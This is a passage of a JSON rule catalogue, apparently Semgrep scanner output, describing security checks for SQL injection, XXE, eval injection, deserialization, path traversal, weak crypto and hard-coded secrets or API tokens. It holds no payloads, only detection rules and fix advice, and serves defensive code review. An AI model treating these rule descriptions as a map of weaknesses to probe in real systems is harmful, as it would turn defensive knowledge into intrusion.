[https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","id":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","name":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information."},"help":{"markdown":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string)\n - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html)\n","text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string","id":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","name":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.code.user-eval-format-string.user-eval-format-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls."},"help":{"markdown":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests)\n","text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","id":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","name":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"help":{"markdown":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","id":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","name":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","id":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","name":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"help":{"markdown":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n","text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder","id":"java.lang.security.audit.xml-decoder.xml-decoder","name":"java.lang.security.audit.xml-decoder.xml-decoder","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-decoder.xml-decoder"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Onfido live API Token detected"},"help":{"markdown":"Onfido live API Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token)\n - [https://documentation.onfido.com/api/latest/#api-tokens](https://documentation.onfido.com/api/latest/#api-tokens)\n","text":"Onfido live API Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","id":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","name":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","id":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","name":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli","id":"java.spring.security.jpa-sqli.jpa-sqli","name":"java.spring.security.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"help":{"markdown":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","id":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","name":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"help":{"markdown":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected)\n - [https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping](https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping)\n - [https://jinja.palletsprojects.com/en/2.11.x/intro/#](https://jinja.palletsprojects.com/en/2.11.x/intro/#)\n","text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected","id":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","name":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.mako-templates-detected.mako-templates-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"help":{"markdown":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification)\n - [https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate](https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate)\n - [https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1](https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1)\n","text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"help":{"markdown":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow](https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow)\n","text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos","id":"cpp.lang.security.strings.std-string-npos.std-string-npos","name":"cpp.lang.security.strings.std-string-npos.std-string-npos","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.std-string-npos.std-string-npos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","id":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","name":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"help":{"markdown":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.nan-injection.nan-injection)\n - [https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868](https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868)\n - [https://blog.bitdiscovery.com/2021/12/python-nan-injection/](https://blog.bitdiscovery.com/2021/12/python-nan-injection/)\n","text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"helpUri":"https://semgrep.dev/r/python.django.security.nan-injection.nan-injection","id":"python.django.security.nan-injection.nan-injection","name":"python.django.security.nan-injection.nan-injection","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.nan-injection.nan-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also 